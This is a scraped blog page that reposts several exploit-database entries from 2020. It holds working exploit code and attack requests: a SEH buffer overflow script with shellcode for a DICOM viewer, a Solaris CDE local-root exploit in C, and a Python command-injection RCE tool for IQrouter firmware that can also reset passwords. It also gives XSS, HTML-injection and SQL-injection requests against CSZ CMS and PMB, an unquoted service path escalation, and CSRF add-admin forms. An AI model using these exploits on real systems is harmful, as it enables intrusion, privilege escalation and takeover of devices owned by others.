# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-04-17
# Vendor Homepage: http://www.drive-software.com
# Software Link: http://www.drive-software.com/download/ataclock.exe
# Version: 6.3
# Tested On: Windows 10 Pro 1909 (32-bit)
# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
# Vulnerability Description:
# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain.
# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution.
# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AtomicAlarmClock
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Atomic Alarm Clock Time
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863157941
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc
#!/usr/bin/python
import struct
junk1 = "A"*1868
#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)
jmp1 = "\xeb\xf8\xcc\xcc"
jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
#Payload size: 220 bytes
calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")
junk2 = "\x90"*14
buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh
with open("overview.txt","wb") as f:
f.write(buffer[:-1])
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.
# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation
# Date: 2020-04-21
# Author: Marco Ivaldi
# Vendor: www.oracle.com
# CVE: CVE-2020-2944
/*
* raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
* Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* A buffer overflow in the _SanityCheck() function in the Common Desktop
* Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
* earlier allows local users to gain root privileges via a long calendar name
* or calendar owner passed to sdtcm_convert in a malicious calendar file
* (CVE-2020-2944).
*
* The open source version of CDE (based on the CDE 2.x codebase) is not
* affected, because it does not ship the vulnerable binary.
*
* "CDE, the gift that keeps on giving" -- @0xdea
* "Feels more like a curse you can't break from this side." -- @alanc
*
* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
* space, try returning to sprintf() instead of strcpy().
*
* I haven't written a Solaris/SPARC version because I don't have a SPARC box
* on which Solaris 10 can run. If anybody is kind enough to give me access to
* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
*
* Usage:
* $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
* $ ./raptor_sdtcm_conv
* [...]
* Do you want to correct it? (Y/N) [Y] n
* # id
* uid=0(root) gid=1(other) egid=12(daemon)
* #
*
* This should work with any common configuration on the first try. To
* re-enable rpc.cmsd, clear its service maintenance status by running the
* following commands as root:
* # /usr/sbin/svcadm clear cde-calendar-manager
* # /usr/bin/svcs -a | grep calendar
* online 13:16:54 svc:/network/rpc/cde-calendar-manager:default
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program
#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility
#define BUFSIZE 2304 // size of the name/owner
#define PAYSIZE 1024 // size of the payload
#define OFFSET env_len / 2 // offset to the shellcode
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], payload[PAYSIZE];
char platform[256], release[256], hostname[256];
int i, payaddr;
char *arg[3] = {"foo", "hax0r", NULL};
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
char cmd[1024];
FILE *fp;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 1) {
fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
exit(1);
}
/* get system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);
/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
memset(payload, '\x90', PAYSIZE);
payload[PAYSIZE - 1] = 0x0;
memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
/* fill the envp, keeping padding */
add_env(payload);
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the payload address */
payaddr = sb - OFFSET;
/* prepare the evil palette name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
/* fill with function address in ld.so.1, saved eip, and arguments */
for (i = 0; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, payaddr); /* 2nd argument */
}
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* create the evil calendar file */
fprintf(stderr, "Preparing the evil calendar file... ");
snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
if (system(cmd) == -1) {
perror("Error creating calendar file");
exit(1);
}
if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
perror("Error creating calendar file");
exit(1);
}
/* prepare the evil calendar file (badchars currently not handled) */
fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
if (!fp) {
perror("Error preparing calendar file");
exit(1);
}
fprintf(fp, "Version: 4\n(calendarattributes "
"(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
"\"10:access_list\",\"world:2\")\n");
/* buffer overflow in calendar name */
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"%s\")\n", buf);
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"fnord\")\n)");
/* buffer overflow in calendar owner */
/*
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"hax0r\")\n");
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"%s\")\n)", buf);
*/
fclose(fp);
fprintf(stderr, "Done.\n");
/* run the vulnerable program */
fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "Sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "Can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send
# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.
-==== POC ====-
http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]
Using SQLMAP :
./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords
-==== Exploit requirements ====-
- You will need to be logged in in order to exploit the vulnerability.
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A
#!/usr/bin/env python3
import argparse
from sys import argv, exit
try:
import requests
except ImportError:
print("Install requests lib! pip3 install requests")
print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")
rce_setup = [
[
"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
"RCE /vlanTag (vlan_tag param)"
],
[
"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
"RCE /screen9 (s2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
"RCE /screen9 (s1 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
"RCE /screen9 (p2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
"RCE /screen9 (p1 param)"
],
[
"/cgi-bin/luci/er/screen4?save_isp='`{}`",
"RCE /screen4 (save_isp param)"
],
[
"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
"RCE /screen2 set_wan_modem_interfaces param)"
],
[
"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
"RCE /screen2 find_ip_address_conflict param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
"RCE /screen10 (set_security_question param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
"RCE /screen10 (set_security_answer param)"],
[
"/cgi-bin/luci/er/screen1?zonename='`{}`'",
"RCE /screen1 (zonename param)"
],
[
"/cgi-bin/luci/er/register?email=`{}`",
"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
]
]
rce_any = [
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
"RCE /wifi (s2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
"RCE /wifi (s1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
"RCE /wifi (p2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
"RCE /wifi (p1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_5g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_2g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guest_key param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
"RCE /wifi (enable_guestwifi param)"
],
[
"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123",
"RCE /screen11.1 (email param)"
],
[
"/cgi-bin/luci/er/reboot_link?link='`{}`'",
"RCE /reboot_link (link param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
"RCE /diag_wifi (htm5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
"RCE /diag_wifi (htm2ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
"RCE /diag_wifi (c5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
"RCE /diag_wifi (c2ghz param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
"RCE /diag_set_static_wan (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
"RCE /diag_set_static_wan (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
"RCE /diag_set_static_wan (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
"RCE /diag_set_static_wan (dns param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
"RCE /diag_set_static_modem (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
"RCE /diag_set_static_modem (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
"RCE /diag_set_static_modem (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
"RCE /diag_set_device_name_and_sync (device_name param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
"RCE /diag_set_device_name (device_name param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
"RCE /diag_pppoe_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
"RCE /diag_pppoe_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
"RCE /diag_pppoe (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
"RCE /diag_pppoe (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
"RCE /diag_pppoa_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
"RCE /diag_pppoa_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
"RCE /diag_pppoa (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
"RCE /diag_pppoa (wan_password param)"
],
[
"/cgi-bin/luci/er/advanced_link?link='`{}`'",
"RCE /advanced_link (link param)"
]
]
advanced_payloads = [
[
"/cgi-bin/luci/er/reboot_link?reboot=1",
"Reboot IQrouter (/reboot_link reboot param))"
],
[
"/cgi-bin/luci/er/screen2?reboot=1",
"Reboot IQrouter (/screen2 reboot param))"
],
[
"/cgi-bin/luci/er/index?reset_config=1",
"Reset IQrouter (/index reset_config param)"
],
[
"/cgi-bin/luci/er/screen7?upgrade=1",
"Upgrade IQrouter (/screen7 upgrade param)"
],
[
"/cgi-bin/luci/er/vlanTag?restart_network=1",
"Restart network (/vlanTag restart_network param)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/start",
"Start iperf script (/diag_iperf_cmd/start)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/stop",
"Stop iperf script (/diag_iperf_cmd/stop)"
],
[
"/cgi-bin/luci/er/get_syslog",
"Router setup info log (/get_syslog)"
],
[
"/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
"Change root password to c00lpasswd (can change in code)"
],
[
"/cgi-bin/luci/er/reset_password/",
"Change root password to 'changeme' (static)"
]
]
def print_payloads():
print('#' * 30)
print("Payloads list")
num = 1
print('######################### RCE without auth ########################')
for payload in rce_any:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'############### RCE (router need to be in setup mode) ###############')
for payload in rce_setup:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'######################### Advanced payloads #########################')
for payload in advanced_payloads:
print("{} - {}".format(num, payload[1]))
num += 1
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
default="http", type=str)
args = parser.parse_args()
def main():
print("")
full_payload_list = rce_setup + rce_any + advanced_payloads
payloads_amount = len(full_payload_list)
try:
hostname = args.host
port = args.port
payload_num = int(args.num)
bash_cmd = args.cmd
protocol = args.protocol
if payload_num < 1 or payload_num > payloads_amount:
print("Error with payload number!")
raise IndexError
if port < 0 or port > 65535:
print("Error with port number")
raise IndexError
if protocol not in ['http', 'https']:
print("Error with protocol name")
raise IndexError
current_payload = full_payload_list[payload_num - 1]
print("Payload: {}".format(current_payload[1]))
print("Host: {}".format(hostname))
print("Port: {}".format(port))
print("Protocol: {}".format(protocol))
print("Command: {}".format(bash_cmd))
full_url = "{}://{}:{}{}".format(protocol, hostname, port,
current_payload[0].format(bash_cmd))
print("Built URL: {}".format(full_url))
r = requests.get(full_url)
print("Status code: {}".format(r.status_code))
return
except IndexError:
parser.print_help()
print_payloads()
exit(1)
if __name__ == '__main__':
print(
"\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
exit(main())
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Google Dork:jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Product web page: https://www.p5.hu
# Affected version: 1.0.20, 1.0.11
# CVE : N/A
<!--
P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting
Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11
Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesn’t exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.
Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.
Tested on: Linux
CGI
Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php
29.01.2020
-->
<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
